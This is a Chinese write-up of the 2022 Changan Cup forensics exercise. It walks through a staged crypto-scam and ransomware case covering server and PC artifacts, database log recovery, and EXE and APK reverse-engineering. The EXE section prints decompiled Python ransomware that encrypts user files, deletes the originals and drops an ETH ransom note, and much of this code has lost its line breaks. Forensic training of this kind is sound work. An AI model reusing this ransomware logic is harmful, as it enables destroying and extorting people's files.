当前位置：首页 > news >正文

2022长安杯复现

news 文章来源：https://blog.csdn.net/2202_75317918/article/details/136157340 2025/5/22 19:39:09

案件情况

某地警方接到受害人报案称其在某虚拟币交易网站遭遇诈骗，该网站号称使用“USTD 币”购买所谓的“HT 币”，受害人充值后不但“HT 币”无法提现、交易，而且手机还被恶意软件锁定勒索。警方根据受害人提供的虚拟币交易网站调取了对应的服务器镜像并对案件展开侦查。

检材1

1、检材1的SHA256值为：

火眼打开之后计算出希哈值：9E48BB2CAE5C1D93BAF572E3646D2ECD26080B70413DC7DC4131F88289F49E34

2、分析检材1，搭建该服务器的技术员IP地址是多少？用该地址解压检材2【172.16.80.100】

仿真出来last命令

172.16.80.100

3、检材1中，操作系统发行版本号为

Cntos Linux release 7.5.1804 (Core)

cat /etc/redhat-release

4、检材1系统中，网卡绑定的静态IP地址为

172.16.80.133

ifconfig命令查看即可

5、检材1中，网站jar包所存放的目录是（答案为绝对路径，如“/home/honglian/”)

/web/app

查看历史命令，发现多次进入/web/app目录，并执行npm等指令，进入后发现有多个jar包，确定为网站jar包所存放目录

6、检材1中，监听7000端口的进程对应文件名为

cloud.jar

导出所有jar包放入Java反编译工具（此时遇到打不开的情况，可以重新去检验镜像哈希，应该是镜像损坏，导致导出的jar包损坏）

7、检材1中，网站管理后台页面对应的网络端口为【9090】

在检材二的charm浏览器的历史记录中

8、检材1中，网站前台页面里给出的APK的下载地址是

网站启动起来
3000端口出现app下载，扫描二维码
可以知道网址是https://pan.forensix.cn/f/c45ca511c7f2469090ad/?dl=1

9. 检材1中，网站管理后台页面调用的用户表(admin)里的密码字段加密方式为?

导出admin所在jar包，搜索password：可以发现密码和验证码的加密方式都为MD5

10. 分析检材1，网站管理后台登录密码加密算法中所使用的盐值是

XehGyeyrVgOV4P8Uf70REVpIw3iVNwNs

定位md5Key

最后发现MD5.key即为加密算法的盐值

检材2

11. 检材2中，windows账户Web King的登录密码是

135790

通过分析软件，可以看到密码

12. 检材2中，除检材1以外，还远程连接过哪个IP地址？并用该地址解压检材3

172.16.80.128

查看xshell的连接记录，可以发现

已知检材1的IP是：172.16.80.133

所以在分析结果中排除172.16.80.133，另一个IP即是答案

13. 检材2中，powershell中输入的最后一条命令是

ipconfig

powershell命令的默认存储目录\Users\[user]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt，在该路径下也可以找到

14. 检材2中，下载的涉案网站源代码文件名为

ZTuoExchange_framework-master.zip

谷歌浏览器里有相应的zip下载记录，导出文件

15. 检材2中，网站管理后台root账号的密码为

root

在谷歌浏览器保存了账号和密码

16. 检材2中，技术员使用的WSL子系统发行版本是（答案格式如下：windows 10.1）

Ubuntu 20.04

仿真过后通过命令wsl -l可以获取到

或者通过分析程序发现，命令都是在20.04中输入的

17. 检材2中，运行的数据库服务版本号是（答案格式如下：10.1）

8.0.30

通过分析程序查看，可以看到版本号

18. 上述数据库debian-sys-maint用户的初始密码是

mysql的debian-sys-maint的初始密码保存在mysql目录的配置文件debian.cnf中

数据库是在wsl子系统中运行的，因此需要定位到子系统目录C:\Users\Web King\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu20.04LTS_79rhkp1fndgsc\LocalState\rootfs

19. 检材3服务器root账号的密码是

h123456
系统SSH历史输入命令中，发现曾使用sshpass对172.16.80.128进行连接，连接密码为h123456

检材三

根据网站前端和技术员个人电脑上的线索，发现了网站后端所在的服务器IP并再次调证取得“检材3”，分析所有掌握的检材回答下列问题

通过第12题答案，解压检材3

20. 检材3中，监听33050端口的程序名（program name)为

docker-proxy

在历史命令中发现嫌疑人进入了/data/mysql 之后使用了docker-compose up

进入目录后，查看docker-compose.yml配置文件，发现使用了33050，尝试启动后发现program name

netstat -tunlp

21. 除MySQL外，该网站还依赖以下哪种数据库

在对admin-api.jar的逆向分析中，发现使用了redis以及mongodb

22. 检材3中，MySQL数据库root账号的密码是

admin-api.jar中也可分析出密码

23. 检材3中，MySQL数据库在容器内部的数据目录为

通过进入容器内部找到相关信息

docker exec -it 8eda4cb0b452 bash

24. 涉案网站调用的MySQL数据库名为、

25. 勒索者在数据库中修改了多少个用户的手机号？

在 docker 中的 /var/lib/mysql 目录下，根据 docker-compose 的配置映射到宿主机上就在 /data/mysql/db 目录下,8eda4cb0b452.log可以导出来查看，比较方便,问修改的数量，过滤 update 关键字，在日志中有 8 处匹配，但实际上有关 mobile_phone 的日志只有 3 条

2022-10-18T08:48:06.120268Z	    8 Query	update admin set last_login_time='2022-10-18 04:48:06.114', last_login_ip=null where id=1
2022-10-18T08:48:21.016425Z	    8 Query	update admin set last_login_time='2022-10-18 04:48:21.023', last_login_ip='172.16.80.100' where id=1
2022-10-18T09:38:56.117223Z	    9 Query	update admin set last_login_time='2022-10-18 05:38:56.113', last_login_ip='172.16.80.197' where id=1
2022-10-19T03:20:39.001499Z	   13 Query	UPDATE `b1`.`member` SET `mobile_phone` = '13638991111' WHERE `id` = 9
2022-10-19T03:20:41.851525Z	   13 Query	UPDATE `b1`.`member` SET `mobile_phone` = '13282992222' WHERE `id` = 10
2022-10-19T03:20:44.184953Z	   13 Query	UPDATE `b1`.`member` SET `mobile_phone` = '13636993333' WHERE `id` = 11
2022-10-19T05:34:00.075764Z	   10 Query	select count(a.id) from member a , member_application b where a.id = b.member_id and b.audit_status = 2 and date_format(b.update_time,'%Y-%m-%d') = '2022-10-18'
2022-10-20T03:18:25.478485Z	   10 Query	update admin set last_login_time='2022-10-19 23:18:25.461', last_login_ip='172.16.80.100' where id=1

26. 勒索者在数据库中删除的用户数量为

在log文件中可以搜索到有批量删除的记录，delete from b1 member··，记数一下有28个

27. 还原被破坏的数据库，分析除技术员以外，还有哪个IP地址登录过管理后台网站？用该地址解压检材4

172.16.80.197

用数据库分析工具来分析一下，172.16.80.197登录了管理后台的网址

28. 还原全部被删改数据，用户id为500的注册会员的HT币钱包地址为

cee631121c2ec9232f3a2f028ad5c89b

在member_wallet表中，找到ID=500的用户，得到

29. 还原全部被删改数据，共有多少名用户的会员等级为’LV3’

将member数据库导出成csv结构，筛选出member_grade_id=3，有158条。但我们还要还原数据，实际上 member 表中还有 28 条被删除的用户记录，28 个用户中有6个 LV3，共164个

“SELECT count(member_grade_id) FROM member WHERE member_grade_id=3”

30. 还原全部被删改数据，哪些用户ID没有充值记录

318，989

SELECT id  from member where id not in (select member_id from member_transaction)

31. 还原全部被删改数据，2022年10月17日总计产生多少笔交易记录？

1000

select count(*) from member_transaction where create_time BETWEEN "2022-10-17 00:00:00" and "2022-10-17 23:59:59"

32. 还原全部被删改数据，该网站中充值的USDT总额为

408228

select sum(amount) from member_transaction

检材四

根据前期侦查分析，通过技术手段找到了幕后老板，并对其使用的安卓模拟器“检材4”进行了固定。分析所有掌握的检材，回答下列问题

修改文件为zip，然后打开发现vmdk文件，导入火眼中分析

33. 嫌疑人使用的安卓模拟器软件名称是

夜神模拟器

34. 检材4中，“老板”的阿里云账号是

forensixtech1

35.检材4中安装的VPN工具的软件名称是

v2Ray

配置信息里面就有

36. 上述VPN工具中记录的节点IP是

38.68.135.18

37. 检材4中，录屏软件安装时间为

2022-10-19 10:50:27

通过apk的位置找到软件的包名

回到火眼

38. 上述录屏软件中名为“s_20221019105129”的录像，在模拟器存储中对应的原始文件名为

0c2f5dd4a9bc6f34873fb3c0ee9b762b98e8c46626410be7191b11710117a12d

在目录/storage/emulated/0/Android/data/com.jiadi.luping/files 下找到录屏文件

39. 上述录屏软件登录的手机号是

18645091802

通过导出record.db还有record.db-wal文件，导入DB Brower中分析得到

40. 检材4中，发送勒索邮件的邮箱地址为

skterran@163.com

火眼直接分析得到

EXE分析

分析所有掌握的检材，找到勒索邮件中被加密的文档和对应的加/解密程序，并回答下列问题

41.分析加密程序，编译该加密程序使用的语言是

python

42. 分析加密程序，它会加密哪些扩展名的文件？

txt.jpg.docx.xls

参考文章：pyinstaller打包成exe的反向解析工具(pyinstxtractor.py和uncompyle6) - 简书

python pyinstxtractor.py encrypt_file.exe

在解析生成的encrypt_file.exe_extracted目录中的PYZ-00.pyz_extracted目录

找一个.pyc文件复制前12字节16进制到encrypt_file_1前面

用uncompyle6进行反编译

uncompyle6 .\encrypt_file_1.pyc >123.py

反编译成功

# uncompyle6 version 3.8.0
# Python bytecode 3.6 (3379)
# Decompiled from: Python 3.7.4 (tags/v3.7.4:e09359112e, Jul  8 2019, 20:34:20) [MSC v.1916 64 bit (AMD64)]
# Embedded file name: encrypt_file_1.py
# Compiled at: 1995-09-28 00:18:56
# Size of source mod 2**32: 272 bytes
import time
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5
import os
pubkey = '-----BEGIN PUBLIC KEY-----\n（有风险提示所以删除只留下后5位）u+w==\n-----END PUBLIC KEY-----\n'
msg = "SOMETHING WENT WRONG,PLEASE CONTACT YOUR SYSTEM ADMINISTRATOR!\nHe can help you to understand whats happened.\nIf he can't help you,contact us via email:\naa1028@forensix.cn\nale@forensix.cn\nHURRY UP!WE HAVE ANTIDOTE FOR YOUR FILES!DISCOUNT 20%FOR CLIENTS,WHO CONTACT US IN THE SAME DAY!\nYou can attach 2 files (text or picture)to check our honest intentions,we will heal them and send\nback.\nPlease pay 0.618 ETH\nThe wallet address：0xef9edf6cdacb7d925aee0f9bd607b544c5758850\n************************************\n"class XORCBC:def __init__(self, key: bytes):self.key = bytearray(key)self.cur = 0def encrypt(self, data: bytes) -> bytes:data = bytearray(data)for i in range(len(data)):tmp = data[i]data[i] ^= self.key[self.cur]self.key[self.cur] = tmpself.cur = (self.cur + 1) % len(self.key)return bytes(data)print('加密程序V1.0')
print('文件正在加密中~~~~~~~~~~~~~~~~~~\n')def run_finall():for filepath, dirnames, filenames in os.walk(os.getcwd()):for filename in filenames:if filename != 'encrypt_file.py' and filename != 'decrypt_file.py' and '_encrypted' not in filename:ExtensionPath = os.path.splitext(filename)[(-1)]if '.txt' == ExtensionPath or '.jpg' == ExtensionPath or '.xls' == ExtensionPath or '.docx' == ExtensionPath:time.sleep(3)data_file = os.path.join(filepath, filename)rsakey = RSA.import_key(pubkey)cipher = Cipher_pkcs1_v1_5.new(rsakey)xor_key = os.urandom(16)xor_obj = XORCBC(xor_key)outf = open(data_file + '_encrypted', 'wb')encrypted_xor_key = cipher.encrypt(xor_key)outf.write(encrypted_xor_key)buffer_size = 4096with open(data_file, 'rb') as (f):while True:data = f.read(buffer_size)if not data:breakoutf.write(xor_obj.encrypt(data))outf.close()os.remove(data_file)run_finall()def redme():try:dir = os.path.join(os.path.expanduser('~'), 'Desktop')print(dir)with open(dir + '/!READ_ME.txt', 'w') as (ff):ff.write(msg)except:dir1 = os.getcwd()print(dir1)with open(dir1 + '/!READ_ME.txt', 'w') as (ff):ff.write(msg)print('\n加密完成~~~~~~~~~~~~~~~~~~')
os.system('pause')
# okay decompiling .\encrypt_file_1.pyc

“if '.txt' == ExtensionPath or '.jpg' == ExtensionPath or '.xls' == ExtensionPath or '.docx' == ExtensionPath:”-----------------是对txt.jpg.docx.xls的文件进行加密

43. 分析加密程序，是通过什么算法对文件进行加密的？

data_file = os.path.join(filepath, filename)rsakey = RSA.import_key(pubkey)cipher = Cipher_pkcs1_v1_5.new(rsakey)xor_key = os.urandom(16)xor_obj = XORCBC(xor_key)outf = open(data_file + '_encrypted', 'wb')encrypted_xor_key = cipher.encrypt(xor_key)outf.write(encrypted_xor_key)buffer_size = 4096with open(data_file, 'rb') as (f):while True:data = f.read(buffer_size)if not data:breakoutf.write(xor_obj.encrypt(data))outf.close()os.remove(data_file)

首先把公钥导入，生成一个rsakey，然后把rsakey通过cipher加密生成了一个cipher字符串随后通过cipher加密了xor_key，xor_key是一个随机的16位字符串（os.urandom(16)），因此是outf.write(encrypted_xor_key)加密了文件

异或加密

class XORCBC:def __init__(self, key: bytes):self.key = bytearray(key)self.cur = 0def encrypt(self, data: bytes) -> bytes:data = bytearray(data)for i in range(len(data)):tmp = data[i]data[i] ^= self.key[self.cur]self.key[self.cur] = tmpself.cur = (self.cur + 1) % len(self.key)return bytes(data)

44. 分析加密程序，其使用的非对称加密方式公钥后5位为？

根据解密后的内容得到公钥

pubkey = '-----BEGIN PUBLIC KEY-----\nMIIBIzANBgkqhkiG9w0BAQEFAAOCARAAMIIBCwKCAQEAx5JF4elVDBaakgGeDSxI\nCO1LyyZ6B2TgR4DNYiQoB1zAyWPDwektaCfnvNeHURBrw++HvbuNMoQNdOJNZZVo\nbHVZh+rCI4MwAh+EBFUeT8Dzja4ZlU9E7jufm69TQS0PSseIiU/4Byd2i9BvIbRn\nHLFZvi/VXphGeW0qVeHkQ3Ll6hJ2fUGhTsuGLc1XXHfiZ4RbJY/AMnjYPy9CaYzi\nSOT4PCf/O12Kuu9ZklsIAihRPl10SmM4IRnVhZYYpXedAyTcYCuUiI4c37F5GAhz\nRDFn9IQ6YQRjlLjuOX8WB6H4NbnKX/kd0GsQP3Zbogazj/z7OM0Y3rv3T8mtF6/I\nkwIEHoau+w==\n-----END PUBLIC KEY-----\n'

可以得到u+w==

45. 被加密文档中，FLAG1的值是

TREFWGFS

通过相同的方法，对decrypt_file.exe进行逆向

随后得到的密码为：4008003721

使用该密码解密

apk分析

46. 恶意APK程序的包名为

cn.forensix.changancup

通过第8题得到的链接下载apk并分析，jadx打开看到包名

47. APK调用的权限包括

READ_EXTERNAL_STORAGE|WRITE_EXTERNAL_STORAGE

继续查看AndroidManifest.xml，得到权限

48. 解锁第一关所使用的FLAG2值为（FLAG为8位字符串，如需在apk中输入FLAG，请输入完整内容，如输入"FLAG9:QWERT123"）

MATSFRKG

利用雷电进行一键脱壳

脱壳后反编译jadx

直接搜索FLAG2，可以看到结果

49. 解锁第二关所使用的FLAG3值为(FLAG为8位字符串，如需在apk中输入FLAG，请输入完整内容，如输入"FLAG9:QWERT123")

找到了mainactivity，分析flag2周围的函数

找到加密的地方

} else if (App.OooO0O0.OooO0oo.equals(this.OooO0o0.getText().toString()) && App.OooO0OO.edit().putInt("unlocked", App.OooO0OO.getInt("unlocked", 0) | 2).commit()) {StringBuilder OooO0OO2 = C0261o0000Oo.OooO0OO(App.OooO0OO.getString("flag16_tkey", ""));OooO0OO2.append(App.OooO0O0.OooO0oo);if (App.OooO0OO.edit().putString("flag16_tkey", OooO0OO2.toString()).commit()) {App.OooO0Oo();System.out.println("delay lock screen close");OooO00o();}

this.OooO0oo = new String(decrypt(OooO0O0.OooO0O0("ffd4d7459ad24cd035611b014a2cccac")));

分析可得进行了两次加密

decrypt函数：

public native byte[] decrypt(byte[] bArr);public native byte[] encrypt(byte[] bArr);public native void init(byte[] bArr);

init函数调用了libcipher.so对密文进行了解密，与输入的值进行比较，最终判断是否正确

package com.example.hanshu;
import android.app.Application;
import android.util.Log;public class App extends Application {static {System.loadLibrary("cipher");}public native byte[] decrypt(byte[] bArr);public native byte[] encrypt(byte[] bArr);public native void init(byte[] bArr);public static  void  main(){String out = new String(new App().decrypt(OooO0O0("ffd4d7459ad24cd035611b014a2cccac")));System.out.println("ocipher:"+out);}public static byte[] OooO0O0(String str){int length = str.length() / 2;byte[] bArr = new byte[length];for (int i =0; i < length; i++){int i2 = i +2;bArr[i] = (byte) Integer.parseInt(str.substring(i2, i2+2),  16);}return bArr;}}

最后连接模拟器，将此apk推送到模拟器中，查看日志，即可找到FLAG3

FLAG3:TDQ2UWP9

50. 解锁第三关所需的KEY值由ASCII可显示字符组成，请请分析获取该KEY值

限制输入24个字符串，然后分成四位一组分成六组数，

密码由全部可显示的ASCII码组成，在标准的ASCII表中，可打印的字符的编码范围是33-126，在代码中是对分为6组的数组依次判断，也就是说我们可以通过每4位爆破的方式，组成全部的密码

public class Test{static int[] OooO0oO = {1197727163, 1106668241, 312918615, 1828680913, 1668105995, 1728985987};public static long[] OooO(long j, long j2) {if (j == 0) {return new long[]{0, 1};}long[] OooO = OooO(j2 % j, j);return new long[]{((j2 / j) * OooO[0]) + OooO[1], OooO[0]};}public static void main(String[] args) {String res = "";for (int i = 0; i < 6; i++) {//4层循环遍历4位字符串for (int a1 = 33; a1 < 127; a1++) {for (int a2 = 33; a2 < 127; a2++) {for (int a3 = 33; a3 < 127; a3++) {for (int a4 = 33; a4 < 127; a4++) {long tmp = (long) (a1 << 16);tmp = tmp | ((long) (a2 << '\b'));tmp = tmp | ((long) (a3 << 24));tmp = ((long) a4) | tmp;if (((OooO(tmp, 0x100000000L)[0] % 0x100000000L) + 0x100000000L) % 0x100000000L == ((long) OooO0oO[i])) {res += (char)a1;res += (char)a2;res += (char)a3;res += (char)a4;//获取到当前密码后，跳出4层循环a1 = a2 = a3 = a4 = 128;}}}}}}System.out.println(res);}
}

运行结果

a_asd./1imc2)dd1234]_+=+